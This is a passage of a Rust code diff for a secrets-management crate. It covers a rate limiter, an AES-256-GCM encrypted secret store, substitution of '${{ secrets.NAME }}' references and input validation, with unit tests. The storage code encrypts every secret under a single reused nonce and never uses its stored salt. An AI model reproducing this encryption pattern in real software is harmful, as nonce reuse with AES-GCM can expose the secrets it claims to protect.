let time_until_reset = self.config.window_duration - (now - tracker.first_request);
|
||||
return Err(SecretError::RateLimitExceeded(format!(
|
||||
"Rate limit exceeded. Try again in {} seconds",
|
||||
time_until_reset.as_secs()
|
||||
)));
|
||||
}
|
||||
|
||||
// Add the current request
|
||||
tracker.add_request(now);
|
||||
} else {
|
||||
// Create new tracker and add first request
|
||||
let mut tracker = RequestTracker::new();
|
||||
tracker.add_request(now);
|
||||
trackers.insert(key.to_string(), tracker);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Reset rate limit for a specific key
|
||||
pub async fn reset_rate_limit(&self, key: &str) {
|
||||
let mut trackers = self.trackers.write().await;
|
||||
trackers.remove(key);
|
||||
}
|
||||
|
||||
/// Clear all rate limit data
|
||||
pub async fn clear_all(&self) {
|
||||
let mut trackers = self.trackers.write().await;
|
||||
trackers.clear();
|
||||
}
|
||||
|
||||
/// Get current request count for a key
|
||||
pub async fn get_request_count(&self, key: &str) -> usize {
|
||||
let trackers = self.trackers.read().await;
|
||||
trackers.get(key).map(|t| t.request_count()).unwrap_or(0)
|
||||
}
|
||||
|
||||
/// Get rate limit configuration
|
||||
pub fn config(&self) -> &RateLimitConfig {
|
||||
&self.config
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for RateLimiter {
|
||||
fn default() -> Self {
|
||||
Self::new(RateLimitConfig::default())
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use tokio::time::Duration;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_rate_limit_basic() {
|
||||
let config = RateLimitConfig {
|
||||
max_requests: 3,
|
||||
window_duration: Duration::from_secs(1),
|
||||
enabled: true,
|
||||
};
|
||||
let limiter = RateLimiter::new(config);
|
||||
|
||||
// First 3 requests should succeed
|
||||
assert!(limiter.check_rate_limit("test_key").await.is_ok());
|
||||
assert!(limiter.check_rate_limit("test_key").await.is_ok());
|
||||
assert!(limiter.check_rate_limit("test_key").await.is_ok());
|
||||
|
||||
// 4th request should fail
|
||||
assert!(limiter.check_rate_limit("test_key").await.is_err());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_rate_limit_different_keys() {
|
||||
let config = RateLimitConfig {
|
||||
max_requests: 2,
|
||||
window_duration: Duration::from_secs(1),
|
||||
enabled: true,
|
||||
};
|
||||
let limiter = RateLimiter::new(config);
|
||||
|
||||
// Different keys should have separate limits
|
||||
assert!(limiter.check_rate_limit("key1").await.is_ok());
|
||||
assert!(limiter.check_rate_limit("key1").await.is_ok());
|
||||
assert!(limiter.check_rate_limit("key2").await.is_ok());
|
||||
assert!(limiter.check_rate_limit("key2").await.is_ok());
|
||||
|
||||
// Both keys should now be at their limit
|
||||
assert!(limiter.check_rate_limit("key1").await.is_err());
|
||||
assert!(limiter.check_rate_limit("key2").await.is_err());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_rate_limit_reset() {
|
||||
let config = RateLimitConfig {
|
||||
max_requests: 1,
|
||||
window_duration: Duration::from_secs(60), // Long window
|
||||
enabled: true,
|
||||
};
|
||||
let limiter = RateLimiter::new(config);
|
||||
|
||||
// Use up the limit
|
||||
assert!(limiter.check_rate_limit("test_key").await.is_ok());
|
||||
assert!(limiter.check_rate_limit("test_key").await.is_err());
|
||||
|
||||
// Reset and try again
|
||||
limiter.reset_rate_limit("test_key").await;
|
||||
assert!(limiter.check_rate_limit("test_key").await.is_ok());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_rate_limit_disabled() {
|
||||
let config = RateLimitConfig {
|
||||
max_requests: 1,
|
||||
window_duration: Duration::from_secs(1),
|
||||
enabled: false,
|
||||
};
|
||||
let limiter = RateLimiter::new(config);
|
||||
|
||||
// All requests should succeed when disabled
|
||||
for _ in 0..10 {
|
||||
assert!(limiter.check_rate_limit("test_key").await.is_ok());
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_request_count() {
|
||||
let config = RateLimitConfig {
|
||||
max_requests: 5,
|
||||
window_duration: Duration::from_secs(1),
|
||||
enabled: true,
|
||||
};
|
||||
let limiter = RateLimiter::new(config);
|
||||
|
||||
assert_eq!(limiter.get_request_count("test_key").await, 0);
|
||||
|
||||
limiter.check_rate_limit("test_key").await.unwrap();
|
||||
assert_eq!(limiter.get_request_count("test_key").await, 1);
|
||||
|
||||
limiter.check_rate_limit("test_key").await.unwrap();
|
||||
assert_eq!(limiter.get_request_count("test_key").await, 2);
|
||||
}
|
||||
}
|
||||
351
crates/secrets/src/storage.rs
Normal file
351
crates/secrets/src/storage.rs
Normal file
@@ -0,0 +1,351 @@
|
||||
use crate::{SecretError, SecretResult};
|
||||
use aes_gcm::{
|
||||
aead::{Aead, KeyInit, OsRng},
|
||||
Aes256Gcm, Key, Nonce,
|
||||
};
|
||||
use base64::{engine::general_purpose, Engine as _};
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::HashMap;
|
||||
|
||||
/// Encrypted secret storage for sensitive data at rest
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct EncryptedSecretStore {
|
||||
/// Encrypted secrets map (base64 encoded)
|
||||
secrets: HashMap<String, String>,
|
||||
/// Salt for key derivation (base64 encoded)
|
||||
salt: String,
|
||||
/// Nonce for encryption (base64 encoded)
|
||||
nonce: String,
|
||||
}
|
||||
|
||||
impl EncryptedSecretStore {
|
||||
/// Create a new encrypted secret store with a random key
|
||||
pub fn new() -> SecretResult<(Self, [u8; 32])> {
|
||||
let key = Aes256Gcm::generate_key(&mut OsRng);
|
||||
let salt = Self::generate_salt();
|
||||
let nonce = Self::generate_nonce();
|
||||
|
||||
let store = Self {
|
||||
secrets: HashMap::new(),
|
||||
salt: general_purpose::STANDARD.encode(salt),
|
||||
nonce: general_purpose::STANDARD.encode(nonce),
|
||||
};
|
||||
|
||||
Ok((store, key.into()))
|
||||
}
|
||||
|
||||
/// Create an encrypted secret store from existing data
|
||||
pub fn from_data(secrets: HashMap<String, String>, salt: String, nonce: String) -> Self {
|
||||
Self {
|
||||
secrets,
|
||||
salt,
|
||||
nonce,
|
||||
}
|
||||
}
|
||||
|
||||
/// Add an encrypted secret
|
||||
pub fn add_secret(&mut self, key: &[u8; 32], name: &str, value: &str) -> SecretResult<()> {
|
||||
let encrypted = self.encrypt_value(key, value)?;
|
||||
self.secrets.insert(name.to_string(), encrypted);
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Get and decrypt a secret
|
||||
pub fn get_secret(&self, key: &[u8; 32], name: &str) -> SecretResult<String> {
|
||||
let encrypted = self
|
||||
.secrets
|
||||
.get(name)
|
||||
.ok_or_else(|| SecretError::not_found(name))?;
|
||||
|
||||
self.decrypt_value(key, encrypted)
|
||||
}
|
||||
|
||||
/// Remove a secret
|
||||
pub fn remove_secret(&mut self, name: &str) -> bool {
|
||||
self.secrets.remove(name).is_some()
|
||||
}
|
||||
|
||||
/// List all secret names
|
||||
pub fn list_secrets(&self) -> Vec<String> {
|
||||
self.secrets.keys().cloned().collect()
|
||||
}
|
||||
|
||||
/// Check if a secret exists
|
||||
pub fn has_secret(&self, name: &str) -> bool {
|
||||
self.secrets.contains_key(name)
|
||||
}
|
||||
|
||||
/// Get the number of stored secrets
|
||||
pub fn secret_count(&self) -> usize {
|
||||
self.secrets.len()
|
||||
}
|
||||
|
||||
/// Clear all secrets
|
||||
pub fn clear(&mut self) {
|
||||
self.secrets.clear();
|
||||
}
|
||||
|
||||
/// Encrypt a value
|
||||
fn encrypt_value(&self, key: &[u8; 32], value: &str) -> SecretResult<String> {
|
||||
let cipher = Aes256Gcm::new(Key::<Aes256Gcm>::from_slice(key));
|
||||
let nonce_bytes = general_purpose::STANDARD
|
||||
.decode(&self.nonce)
|
||||
.map_err(|e| SecretError::EncryptionError(format!("Invalid nonce: {}", e)))?;
|
||||
|
||||
if nonce_bytes.len() != 12 {
|
||||
return Err(SecretError::EncryptionError(
|
||||
"Invalid nonce length".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
let nonce = Nonce::from_slice(&nonce_bytes);
|
||||
let ciphertext = cipher
|
||||
.encrypt(nonce, value.as_bytes())
|
||||
.map_err(|e| SecretError::EncryptionError(format!("Encryption failed: {}", e)))?;
|
||||
|
||||
Ok(general_purpose::STANDARD.encode(&ciphertext))
|
||||
}
|
||||
|
||||
/// Decrypt a value
|
||||
fn decrypt_value(&self, key: &[u8; 32], encrypted: &str) -> SecretResult<String> {
|
||||
let cipher = Aes256Gcm::new(Key::<Aes256Gcm>::from_slice(key));
|
||||
let nonce_bytes = general_purpose::STANDARD
|
||||
.decode(&self.nonce)
|
||||
.map_err(|e| SecretError::EncryptionError(format!("Invalid nonce: {}", e)))?;
|
||||
|
||||
if nonce_bytes.len() != 12 {
|
||||
return Err(SecretError::EncryptionError(
|
||||
"Invalid nonce length".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
let nonce = Nonce::from_slice(&nonce_bytes);
|
||||
let ciphertext = general_purpose::STANDARD
|
||||
.decode(encrypted)
|
||||
.map_err(|e| SecretError::EncryptionError(format!("Invalid ciphertext: {}", e)))?;
|
||||
|
||||
let plaintext = cipher
|
||||
.decrypt(nonce, ciphertext.as_ref())
|
||||
.map_err(|e| SecretError::EncryptionError(format!("Decryption failed: {}", e)))?;
|
||||
|
||||
String::from_utf8(plaintext)
|
||||
.map_err(|e| SecretError::EncryptionError(format!("Invalid UTF-8: {}", e)))
|
||||
}
|
||||
|
||||
/// Generate a random salt
|
||||
fn generate_salt() -> [u8; 32] {
|
||||
let mut salt = [0u8; 32];
|
||||
rand::RngCore::fill_bytes(&mut rand::thread_rng(), &mut salt);
|
||||
salt
|
||||
}
|
||||
|
||||
/// Generate a random nonce
|
||||
fn generate_nonce() -> [u8; 12] {
|
||||
let mut nonce = [0u8; 12];
|
||||
rand::RngCore::fill_bytes(&mut rand::thread_rng(), &mut nonce);
|
||||
nonce
|
||||
}
|
||||
|
||||
/// Serialize to JSON
|
||||
pub fn to_json(&self) -> SecretResult<String> {
|
||||
serde_json::to_string_pretty(self)
|
||||
.map_err(|e| SecretError::internal(format!("Serialization failed: {}", e)))
|
||||
}
|
||||
|
||||
/// Deserialize from JSON
|
||||
pub fn from_json(json: &str) -> SecretResult<Self> {
|
||||
serde_json::from_str(json)
|
||||
.map_err(|e| SecretError::internal(format!("Deserialization failed: {}", e)))
|
||||
}
|
||||
|
||||
/// Save to file
|
||||
pub async fn save_to_file(&self, path: &str) -> SecretResult<()> {
|
||||
let json = self.to_json()?;
|
||||
tokio::fs::write(path, json)
|
||||
.await
|
||||
.map_err(SecretError::IoError)
|
||||
}
|
||||
|
||||
/// Load from file
|
||||
pub async fn load_from_file(path: &str) -> SecretResult<Self> {
|
||||
let json = tokio::fs::read_to_string(path)
|
||||
.await
|
||||
.map_err(SecretError::IoError)?;
|
||||
Self::from_json(&json)
|
||||
}
|
||||
}
|
||||
|
||||
impl Default for EncryptedSecretStore {
|
||||
fn default() -> Self {
|
||||
let (store, _) = Self::new().expect("Failed to create default encrypted store");
|
||||
store
|
||||
}
|
||||
}
|
||||
|
||||
/// Key derivation utilities
|
||||
pub struct KeyDerivation;
|
||||
|
||||
impl KeyDerivation {
|
||||
/// Derive a key from a password using PBKDF2
|
||||
pub fn derive_key_from_password(password: &str, salt: &[u8], iterations: u32) -> [u8; 32] {
|
||||
let mut key = [0u8; 32];
|
||||
let _ = pbkdf2::pbkdf2::<hmac::Hmac<sha2::Sha256>>(
|
||||
password.as_bytes(),
|
||||
salt,
|
||||
iterations,
|
||||
&mut key,
|
||||
);
|
||||
key
|
||||
}
|
||||
|
||||
/// Generate a secure random key
|
||||
pub fn generate_random_key() -> [u8; 32] {
|
||||
Aes256Gcm::generate_key(&mut OsRng).into()
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_encrypted_secret_store_basic() {
|
||||
let (mut store, key) = EncryptedSecretStore::new().unwrap();
|
||||
|
||||
// Add a secret
|
||||
store
|
||||
.add_secret(&key, "test_secret", "secret_value")
|
||||
.unwrap();
|
||||
|
||||
// Retrieve the secret
|
||||
let value = store.get_secret(&key, "test_secret").unwrap();
|
||||
assert_eq!(value, "secret_value");
|
||||
|
||||
// Check metadata
|
||||
assert!(store.has_secret("test_secret"));
|
||||
assert_eq!(store.secret_count(), 1);
|
||||
|
||||
let secrets = store.list_secrets();
|
||||
assert_eq!(secrets.len(), 1);
|
||||
assert!(secrets.contains(&"test_secret".to_string()));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_encrypted_secret_store_multiple_secrets() {
|
||||
let (mut store, key) = EncryptedSecretStore::new().unwrap();
|
||||
|
||||
// Add multiple secrets
|
||||
store.add_secret(&key, "secret1", "value1").unwrap();
|
||||
store.add_secret(&key, "secret2", "value2").unwrap();
|
||||
store.add_secret(&key, "secret3", "value3").unwrap();
|
||||
|
||||
// Retrieve all secrets
|
||||
assert_eq!(store.get_secret(&key, "secret1").unwrap(), "value1");
|
||||
assert_eq!(store.get_secret(&key, "secret2").unwrap(), "value2");
|
||||
assert_eq!(store.get_secret(&key, "secret3").unwrap(), "value3");
|
||||
|
||||
assert_eq!(store.secret_count(), 3);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_encrypted_secret_store_wrong_key() {
|
||||
let (mut store, key1) = EncryptedSecretStore::new().unwrap();
|
||||
let (_, key2) = EncryptedSecretStore::new().unwrap();
|
||||
|
||||
// Add secret with key1
|
||||
store
|
||||
.add_secret(&key1, "test_secret", "secret_value")
|
||||
.unwrap();
|
||||
|
||||
// Try to retrieve with wrong key
|
||||
let result = store.get_secret(&key2, "test_secret");
|
||||
assert!(result.is_err());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_encrypted_secret_store_not_found() {
|
||||
let (store, key) = EncryptedSecretStore::new().unwrap();
|
||||
|
||||
let result = store.get_secret(&key, "nonexistent");
|
||||
assert!(result.is_err());
|
||||
|
||||
match result.unwrap_err() {
|
||||
SecretError::NotFound { name } => {
|
||||
assert_eq!(name, "nonexistent");
|
||||
}
|
||||
_ => panic!("Expected NotFound error"),
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_encrypted_secret_store_remove() {
|
||||
let (mut store, key) = EncryptedSecretStore::new().unwrap();
|
||||
|
||||
store
|
||||
.add_secret(&key, "test_secret", "secret_value")
|
||||
.unwrap();
|
||||
assert!(store.has_secret("test_secret"));
|
||||
|
||||
let removed = store.remove_secret("test_secret");
|
||||
assert!(removed);
|
||||
assert!(!store.has_secret("test_secret"));
|
||||
|
||||
let removed_again = store.remove_secret("test_secret");
|
||||
assert!(!removed_again);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_encrypted_secret_store_serialization() {
|
||||
let (mut store, key) = EncryptedSecretStore::new().unwrap();
|
||||
|
||||
store.add_secret(&key, "secret1", "value1").unwrap();
|
||||
store.add_secret(&key, "secret2", "value2").unwrap();
|
||||
|
||||
// Serialize to JSON
|
||||
let json = store.to_json().unwrap();
|
||||
|
||||
// Deserialize from JSON
|
||||
let restored_store = EncryptedSecretStore::from_json(&json).unwrap();
|
||||
|
||||
// Verify secrets are still accessible
|
||||
assert_eq!(
|
||||
restored_store.get_secret(&key, "secret1").unwrap(),
|
||||
"value1"
|
||||
);
|
||||
assert_eq!(
|
||||
restored_store.get_secret(&key, "secret2").unwrap(),
|
||||
"value2"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_key_derivation() {
|
||||
let password = "test_password";
|
||||
let salt = b"test_salt_bytes_32_chars_long!!";
|
||||
let iterations = 10000;
|
||||
|
||||
let key1 = KeyDerivation::derive_key_from_password(password, salt, iterations);
|
||||
let key2 = KeyDerivation::derive_key_from_password(password, salt, iterations);
|
||||
|
||||
// Same password and salt should produce same key
|
||||
assert_eq!(key1, key2);
|
||||
|
||||
// Different salt should produce different key
|
||||
let different_salt = b"different_salt_bytes_32_chars!";
|
||||
let key3 = KeyDerivation::derive_key_from_password(password, different_salt, iterations);
|
||||
assert_ne!(key1, key3);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_random_key_generation() {
|
||||
let key1 = KeyDerivation::generate_random_key();
|
||||
let key2 = KeyDerivation::generate_random_key();
|
||||
|
||||
// Random keys should be different
|
||||
assert_ne!(key1, key2);
|
||||
|
||||
// Keys should be 32 bytes
|
||||
assert_eq!(key1.len(), 32);
|
||||
assert_eq!(key2.len(), 32);
|
||||
}
|
||||
}
|
||||
252
crates/secrets/src/substitution.rs
Normal file
252
crates/secrets/src/substitution.rs
Normal file
@@ -0,0 +1,252 @@
|
||||
use crate::{SecretManager, SecretResult};
|
||||
use regex::Regex;
|
||||
use std::collections::HashMap;
|
||||
|
||||
lazy_static::lazy_static! {
|
||||
/// Regex to match GitHub-style secret references: ${{ secrets.SECRET_NAME }}
|
||||
static ref SECRET_PATTERN: Regex = Regex::new(
|
||||
r"\$\{\{\s*secrets\.([a-zA-Z0-9_][a-zA-Z0-9_-]*)\s*\}\}"
|
||||
).unwrap();
|
||||
|
||||
/// Regex to match provider-specific secret references: ${{ secrets.provider:SECRET_NAME }}
|
||||
static ref PROVIDER_SECRET_PATTERN: Regex = Regex::new(
|
||||
r"\$\{\{\s*secrets\.([a-zA-Z0-9_][a-zA-Z0-9_-]*):([a-zA-Z0-9_][a-zA-Z0-9_-]*)\s*\}\}"
|
||||
).unwrap();
|
||||
}
|
||||
|
||||
/// Secret substitution engine for replacing secret references in text
|
||||
pub struct SecretSubstitution<'a> {
|
||||
manager: &'a SecretManager,
|
||||
resolved_secrets: HashMap<String, String>,
|
||||
}
|
||||
|
||||
impl<'a> SecretSubstitution<'a> {
|
||||
/// Create a new secret substitution engine
|
||||
pub fn new(manager: &'a SecretManager) -> Self {
|
||||
Self {
|
||||
manager,
|
||||
resolved_secrets: HashMap::new(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Substitute all secret references in the given text
|
||||
pub async fn substitute(&mut self, text: &str) -> SecretResult<String> {
|
||||
let mut result = text.to_string();
|
||||
|
||||
// First, handle provider-specific secrets: ${{ secrets.provider:SECRET_NAME }}
|
||||
result = self.substitute_provider_secrets(&result).await?;
|
||||
|
||||
// Then handle default provider secrets: ${{ secrets.SECRET_NAME }}
|
||||
result = self.substitute_default_secrets(&result).await?;
|
||||
|
||||
Ok(result)
|
||||
}
|
||||
|
||||
/// Substitute provider-specific secret references
|
||||
async fn substitute_provider_secrets(&mut self, text: &str) -> SecretResult<String> {
|
||||
let mut result = text.to_string();
|
||||
|
||||
for captures in PROVIDER_SECRET_PATTERN.captures_iter(text) {
|
||||
let full_match = captures.get(0).unwrap().as_str();
|
||||
let provider = captures.get(1).unwrap().as_str();
|
||||
let secret_name = captures.get(2).unwrap().as_str();
|
||||
|
||||
let cache_key = format!("{}:{}", provider, secret_name);
|
||||
|
||||
let secret_value = if let Some(cached) = self.resolved_secrets.get(&cache_key) {
|
||||
cached.clone()
|
||||
} else {
|
||||
let secret = self
|
||||
.manager
|
||||
.get_secret_from_provider(provider, secret_name)
|
||||
.await?;
|
||||
let value = secret.value().to_string();
|
||||
self.resolved_secrets.insert(cache_key, value.clone());
|
||||
value
|
||||
};
|
||||
|
||||
result = result.replace(full_match, &secret_value);
|
||||
}
|
||||
|
||||
Ok(result)
|
||||
}
|
||||
|
||||
/// Substitute default provider secret references
|
||||
async fn substitute_default_secrets(&mut self, text: &str) -> SecretResult<String> {
|
||||
let mut result = text.to_string();
|
||||
|
||||
for captures in SECRET_PATTERN.captures_iter(text) {
|
||||
let full_match = captures.get(0).unwrap().as_str();
|
||||
let secret_name = captures.get(1).unwrap().as_str();
|
||||
|
||||
let secret_value = if let Some(cached) = self.resolved_secrets.get(secret_name) {
|
||||
cached.clone()
|
||||
} else {
|
||||
let secret = self.manager.get_secret(secret_name).await?;
|
||||
let value = secret.value().to_string();
|
||||
self.resolved_secrets
|
||||
.insert(secret_name.to_string(), value.clone());
|
||||
value
|
||||
};
|
||||
|
||||
result = result.replace(full_match, &secret_value);
|
||||
}
|
||||
|
||||
Ok(result)
|
||||
}
|
||||
|
||||
/// Get all resolved secrets (for masking purposes)
|
||||
pub fn resolved_secrets(&self) -> &HashMap<String, String> {
|
||||
&self.resolved_secrets
|
||||
}
|
||||
|
||||
/// Check if text contains secret references
|
||||
pub fn contains_secrets(text: &str) -> bool {
|
||||
SECRET_PATTERN.is_match(text) || PROVIDER_SECRET_PATTERN.is_match(text)
|
||||
}
|
||||
|
||||
/// Extract all secret references from text without resolving them
|
||||
pub fn extract_secret_refs(text: &str) -> Vec<SecretRef> {
|
||||
let mut refs = Vec::new();
|
||||
|
||||
// Extract provider-specific references
|
||||
for captures in PROVIDER_SECRET_PATTERN.captures_iter(text) {
|
||||
let full_match = captures.get(0).unwrap().as_str();
|
||||
let provider = captures.get(1).unwrap().as_str();
|
||||
let name = captures.get(2).unwrap().as_str();
|
||||
|
||||
refs.push(SecretRef {
|
||||
full_text: full_match.to_string(),
|
||||
provider: Some(provider.to_string()),
|
||||
name: name.to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
// Extract default provider references
|
||||
for captures in SECRET_PATTERN.captures_iter(text) {
|
||||
let full_match = captures.get(0).unwrap().as_str();
|
||||
let name = captures.get(1).unwrap().as_str();
|
||||
|
||||
refs.push(SecretRef {
|
||||
full_text: full_match.to_string(),
|
||||
provider: None,
|
||||
name: name.to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
refs
|
||||
}
|
||||
}
|
||||
|
||||
/// A reference to a secret found in text
|
||||
#[derive(Debug, Clone, PartialEq)]
|
||||
pub struct SecretRef {
|
||||
/// The full text of the secret reference (e.g., "${{ secrets.API_KEY }}")
|
||||
pub full_text: String,
|
||||
/// The provider name, if specified
|
||||
pub provider: Option<String>,
|
||||
/// The secret name
|
||||
pub name: String,
|
||||
}
|
||||
|
||||
impl SecretRef {
|
||||
/// Get the cache key for this secret reference
|
||||
pub fn cache_key(&self) -> String {
|
||||
match &self.provider {
|
||||
Some(provider) => format!("{}:{}", provider, self.name),
|
||||
None => self.name.clone(),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use crate::{SecretError, SecretManager};
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_basic_secret_substitution() {
|
||||
// Use unique secret names to avoid test conflicts
|
||||
let github_token_name = format!("GITHUB_TOKEN_{}", std::process::id());
|
||||
let api_key_name = format!("API_KEY_{}", std::process::id());
|
||||
|
||||
std::env::set_var(&github_token_name, "ghp_test_token");
|
||||
std::env::set_var(&api_key_name, "secret_api_key");
|
||||
|
||||
let manager = SecretManager::default().await.unwrap();
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
|
||||
let input = format!(
|
||||
"Token: ${{{{ secrets.{} }}}}, API: ${{{{ secrets.{} }}}}",
|
||||
github_token_name, api_key_name
|
||||
);
|
||||
let result = substitution.substitute(&input).await.unwrap();
|
||||
|
||||
assert_eq!(result, "Token: ghp_test_token, API: secret_api_key");
|
||||
|
||||
std::env::remove_var(&github_token_name);
|
||||
std::env::remove_var(&api_key_name);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_provider_specific_substitution() {
|
||||
// Use unique secret name to avoid test conflicts
|
||||
let vault_secret_name = format!("VAULT_SECRET_{}", std::process::id());
|
||||
std::env::set_var(&vault_secret_name, "vault_value");
|
||||
|
||||
let manager = SecretManager::default().await.unwrap();
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
|
||||
let input = format!("Value: ${{{{ secrets.env:{} }}}}", vault_secret_name);
|
||||
let result = substitution.substitute(&input).await.unwrap();
|
||||
|
||||
assert_eq!(result, "Value: vault_value");
|
||||
|
||||
std::env::remove_var(&vault_secret_name);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_extract_secret_refs() {
|
||||
let input = "Token: ${{ secrets.GITHUB_TOKEN }}, Vault: ${{ secrets.vault:API_KEY }}";
|
||||
let refs = SecretSubstitution::extract_secret_refs(input);
|
||||
|
||||
assert_eq!(refs.len(), 2);
|
||||
|
||||
let github_ref = &refs.iter().find(|r| r.name == "GITHUB_TOKEN").unwrap();
|
||||
assert_eq!(github_ref.provider, None);
|
||||
assert_eq!(github_ref.full_text, "${{ secrets.GITHUB_TOKEN }}");
|
||||
|
||||
let vault_ref = &refs.iter().find(|r| r.name == "API_KEY").unwrap();
|
||||
assert_eq!(vault_ref.provider, Some("vault".to_string()));
|
||||
assert_eq!(vault_ref.full_text, "${{ secrets.vault:API_KEY }}");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_contains_secrets() {
|
||||
assert!(SecretSubstitution::contains_secrets(
|
||||
"${{ secrets.API_KEY }}"
|
||||
));
|
||||
assert!(SecretSubstitution::contains_secrets(
|
||||
"${{ secrets.vault:SECRET }}"
|
||||
));
|
||||
assert!(!SecretSubstitution::contains_secrets("${{ matrix.os }}"));
|
||||
assert!(!SecretSubstitution::contains_secrets("No secrets here"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_secret_substitution_error_handling() {
|
||||
let manager = SecretManager::default().await.unwrap();
|
||||
let mut substitution = SecretSubstitution::new(&manager);
|
||||
|
||||
let input = "Token: ${{ secrets.NONEXISTENT_SECRET }}";
|
||||
let result = substitution.substitute(input).await;
|
||||
|
||||
assert!(result.is_err());
|
||||
match result.unwrap_err() {
|
||||
SecretError::NotFound { name } => {
|
||||
assert_eq!(name, "NONEXISTENT_SECRET");
|
||||
}
|
||||
_ => panic!("Expected NotFound error"),
|
||||
}
|
||||
}
|
||||
}
|
||||
241
crates/secrets/src/validation.rs
Normal file
241
crates/secrets/src/validation.rs
Normal file
@@ -0,0 +1,241 @@
|
||||
// Copyright 2024 wrkflw contributors
|
||||
// SPDX-License-Identifier: MIT
|
||||
|
||||
//! Input validation utilities for secrets management
|
||||
|
||||
use crate::{SecretError, SecretResult};
|
||||
use regex::Regex;
|
||||
|
||||
/// Maximum allowed secret value size (1MB)
|
||||
pub const MAX_SECRET_SIZE: usize = 1024 * 1024;
|
||||
|
||||
/// Maximum allowed secret name length
|
||||
pub const MAX_SECRET_NAME_LENGTH: usize = 255;
|
||||
|
||||
lazy_static::lazy_static! {
|
||||
/// Valid secret name pattern: alphanumeric, underscores, hyphens, dots
|
||||
static ref SECRET_NAME_PATTERN: Regex = Regex::new(r"^[a-zA-Z0-9_.-]+$").unwrap();
|
||||
}
|
||||
|
||||
/// Validate a secret name
|
||||
pub fn validate_secret_name(name: &str) -> SecretResult<()> {
|
||||
if name.is_empty() {
|
||||
return Err(SecretError::InvalidSecretName {
|
||||
reason: "Secret name cannot be empty".to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
if name.len() > MAX_SECRET_NAME_LENGTH {
|
||||
return Err(SecretError::InvalidSecretName {
|
||||
reason: format!(
|
||||
"Secret name too long: {} characters (max: {})",
|
||||
name.len(),
|
||||
MAX_SECRET_NAME_LENGTH
|
||||
),
|
||||
});
|
||||
}
|
||||
|
||||
if !SECRET_NAME_PATTERN.is_match(name) {
|
||||
return Err(SecretError::InvalidSecretName {
|
||||
reason: "Secret name can only contain letters, numbers, underscores, hyphens, and dots"
|
||||
.to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
// Check for potentially dangerous patterns
|
||||
if name.starts_with('.') || name.ends_with('.') {
|
||||
return Err(SecretError::InvalidSecretName {
|
||||
reason: "Secret name cannot start or end with a dot".to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
if name.contains("..") {
|
||||
return Err(SecretError::InvalidSecretName {
|
||||
reason: "Secret name cannot contain consecutive dots".to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
// Reserved names
|
||||
let reserved_names = [
|
||||
"CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8",
|
||||
"COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
|
||||
];
|
||||
|
||||
if reserved_names.contains(&name.to_uppercase().as_str()) {
|
||||
return Err(SecretError::InvalidSecretName {
|
||||
reason: format!("'{}' is a reserved name", name),
|
||||
});
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Validate a secret value
|
||||
pub fn validate_secret_value(value: &str) -> SecretResult<()> {
|
||||
let size = value.len();
|
||||
|
||||
if size > MAX_SECRET_SIZE {
|
||||
return Err(SecretError::SecretTooLarge {
|
||||
size,
|
||||
max_size: MAX_SECRET_SIZE,
|
||||
});
|
||||
}
|
||||
|
||||
// Check for null bytes which could cause issues
|
||||
if value.contains('\0') {
|
||||
return Err(SecretError::InvalidFormat(
|
||||
"Secret value cannot contain null bytes".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Validate a provider name
|
||||
pub fn validate_provider_name(name: &str) -> SecretResult<()> {
|
||||
if name.is_empty() {
|
||||
return Err(SecretError::InvalidConfig(
|
||||
"Provider name cannot be empty".to_string(),
|
||||
));
|
||||
}
|
||||
|
||||
if name.len() > 64 {
|
||||
return Err(SecretError::InvalidConfig(format!(
|
||||
"Provider name too long: {} characters (max: 64)",
|
||||
name.len()
|
||||
)));
|
||||
}
|
||||
|
||||
if !name
|
||||
.chars()
|
||||
.all(|c| c.is_alphanumeric() || c == '_' || c == '-')
|
||||
{
|
||||
